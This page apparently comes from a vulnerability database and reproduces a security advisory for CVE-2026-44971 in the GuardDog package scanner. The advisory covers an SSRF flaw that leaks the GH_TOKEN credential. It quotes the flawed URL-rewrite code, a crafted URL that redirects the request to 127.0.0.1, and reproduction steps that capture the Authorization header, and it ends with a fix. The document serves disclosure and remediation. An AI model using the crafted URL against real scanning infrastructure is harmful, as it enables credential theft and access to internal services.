GHSA-587R-MC96-6F2P

Vulnerability from github – Published: 2026-05-11 14:45 – Updated: 2026-05-11 14:45
VLAI
Summary
GuardDog has a blind GitHub URL rewrite in remote project scanning causes SSRF and `GH_TOKEN` exfiltration
Details

Summary

The programmatic remote project scanning path rewrites attacker-controlled repository URLs using a blind string replacement and then sends the caller's GitHub credentials with the resulting request. This allows an attacker who can influence the scanned repository URL to trigger SSRF and capture the GH_TOKEN used by GuardDog.

Description

ProjectScanner.scan_remote() takes a url, branch, and requirements_name, then constructs a raw GitHub URL by calling:

githubusercontent_url = url.replace("github", "raw.githubusercontent")
req_url = f"{githubusercontent_url}/{branch}/{requirements_name}"
resp = requests.get(url=req_url, auth=token)

Because this logic does not parse or validate the hostname, a crafted URL such as:

http://github@127.0.0.1:18081/owner/repo

is transformed into:

http://raw.githubusercontent@127.0.0.1:18081/owner/repo/main/requirements.txt

Requests interprets this as an HTTP request to 127.0.0.1:18081, and GuardDog includes the configured GitHub credentials via HTTP Basic Auth.

Reproduction summary

  1. Start an HTTP listener on 127.0.0.1:18081 that logs the request path and Authorization header.
  2. Set GIT_USERNAME=alice and GH_TOKEN=supersecret.
  3. Call PypiRequirementsScanner().scan_remote("http://github@127.0.0.1:18081/owner/repo", "main", "requirements.txt").
  4. Observe a request to /owner/repo/main/requirements.txt with Authorization: Basic YWxpY2U6c3VwZXJzZWNyZXQ=.

Key code paths

  • guarddog/scanners/scanner.py:361-365

Practical impact

This can expose repository-scanning infrastructure to: - theft of the GitHub PAT configured in GH_TOKEN - SSRF to internal or localhost services reachable by the scanner - attacker-controlled dependency file content returned by the malicious endpoint

Prior public disclosure check

As of 2026-03-18, no matching public GitHub advisory, CVE, or public repo issue was found for this specific bug.

Suggested fix

Parse the input URL, require hostname == "github.com", validate the path shape (owner/repo), build the raw URL from parsed components instead of string replacement, and never send GitHub credentials to non-GitHub hosts.

Severity
8.2 (High)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "guarddog"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.0.0"
            },
            {
              "last_affected": "2.9.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-44971"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-11T14:45:08Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "# Summary\nThe programmatic remote project scanning path rewrites attacker-controlled repository URLs using a blind string replacement and then sends the caller\u0027s GitHub credentials with the resulting request. This allows an attacker who can influence the scanned repository URL to trigger SSRF and capture the `GH_TOKEN` used by GuardDog.\n\n# Description\n`ProjectScanner.scan_remote()` takes a `url`, `branch`, and `requirements_name`, then constructs a raw GitHub URL by calling:\n\n```python\ngithubusercontent_url = url.replace(\"github\", \"raw.githubusercontent\")\nreq_url = f\"{githubusercontent_url}/{branch}/{requirements_name}\"\nresp = requests.get(url=req_url, auth=token)\n```\n\nBecause this logic does not parse or validate the hostname, a crafted URL such as:\n\n```text\nhttp://github@127.0.0.1:18081/owner/repo\n```\n\nis transformed into:\n\n```text\nhttp://raw.githubusercontent@127.0.0.1:18081/owner/repo/main/requirements.txt\n```\n\nRequests interprets this as an HTTP request to `127.0.0.1:18081`, and GuardDog includes the configured GitHub credentials via HTTP Basic Auth.\n\n# Reproduction summary\n1. Start an HTTP listener on `127.0.0.1:18081` that logs the request path and `Authorization` header.\n2. Set `GIT_USERNAME=alice` and `GH_TOKEN=supersecret`.\n3. Call `PypiRequirementsScanner().scan_remote(\"http://github@127.0.0.1:18081/owner/repo\", \"main\", \"requirements.txt\")`.\n4. Observe a request to `/owner/repo/main/requirements.txt` with `Authorization: Basic YWxpY2U6c3VwZXJzZWNyZXQ=`.\n\n# Key code paths\n- `guarddog/scanners/scanner.py:361-365`\n\n# Practical impact\nThis can expose repository-scanning infrastructure to:\n- theft of the GitHub PAT configured in `GH_TOKEN`\n- SSRF to internal or localhost services reachable by the scanner\n- attacker-controlled dependency file content returned by the malicious endpoint\n\n# Prior public disclosure check\nAs of 2026-03-18, no matching public GitHub advisory, CVE, or public repo issue was found for this specific bug.\n\n# Suggested fix\nParse the input URL, require `hostname == \"github.com\"`, validate the path shape (`owner/repo`), build the raw URL from parsed components instead of string replacement, and never send GitHub credentials to non-GitHub hosts.",
  "id": "GHSA-587r-mc96-6f2p",
  "modified": "2026-05-11T14:45:08Z",
  "published": "2026-05-11T14:45:08Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/DataDog/guarddog/security/advisories/GHSA-587r-mc96-6f2p"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/DataDog/guarddog"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "GuardDog has a blind GitHub URL rewrite in remote project scanning causes SSRF and `GH_TOKEN` exfiltration"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.